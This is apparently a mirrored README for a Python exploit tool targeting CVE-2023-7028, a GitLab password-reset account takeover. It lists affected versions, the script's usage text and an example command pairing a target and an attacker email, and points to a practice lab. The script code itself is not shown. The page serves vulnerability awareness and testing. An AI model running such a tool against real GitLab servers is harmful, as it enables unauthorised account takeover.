Share
## https://sploitus.com/exploit?id=CA820A2A-BCE8-5535-9EA1-81063DB2F2B9
# CVE-2023-7028

โš ๏ธ This exploit is for defensive purposes and should be used by cybersecurity professionals to identify possible vulnerable GitLab servers.

# Description

### CVE-2023-7028 - Account Takeover via Password Reset without user interactions in GitLab Community Edition and Enterprise Edition

*Products and Versions affected:*

| Product                           | Affected Versions                                        |
| :-------------------------------- | :------------------------------------------------------- |
| GitLab Community Edition and Enterprise Edition | < 16.1.6 <br /> < 16.2.9<br /> < 16.3.7 <br /> < 16.4.5 <br /> < 16.5.6 <br /> < 16.6.4 <br /> < 16.7.2 |

- **CVSS:** 10.0
- **Actively Exploited:** NO
- **Patch:** YES
- **Mitigation:** NO

# Help

```
usage: CVE-2023-7028.py [-h] -u URL -t TARGET -a ATTACKER

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     GitLab URL (HTTP or HTTPS)
  -t TARGET, --target TARGET
                        Target email address
  -a ATTACKER, --attacker ATTACKER
                        Attacker email address
```

**Example:** `python CVE-2023-7028.py -u https://gitlab.example.com -t admin@example.com -a attacker@notexample.com`

# Lab

You can use Try Hack Me's Room [GitLab CVE-2023-7028](https://tryhackme.com/room/gitlabcve20237028) to test the exploit because it runs a vulnerable version affected by CVE-2023-7028.

# Vision of GitLab Servers by SHADOWSERVER:

![map2](https://github.com/yoryio/CVE-2023-7028/assets/134471901/6140f105-bee0-4bee-b07c-2003c1f0d9a7)

# References

- [GitLab Critical Security Release: 16.7.2, 16.6.4, 16.5.6 ](https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/)
- [Over 5,300 GitLab servers exposed to zero-click account takeover attacks](https://www.bleepingcomputer.com/news/security/over-5-300-gitlab-servers-exposed-to-zero-click-account-takeover-attacks/)
- [Shadowserver GitLab Statistics](https://dashboard.shadowserver.org/statistics/combined/map/?map_type=std&day=2024-01-23&source=http_vulnerable&source=http_vulnerable6&tag=cve-2023-7028%2B&geo=all&data_set=count&scale=log)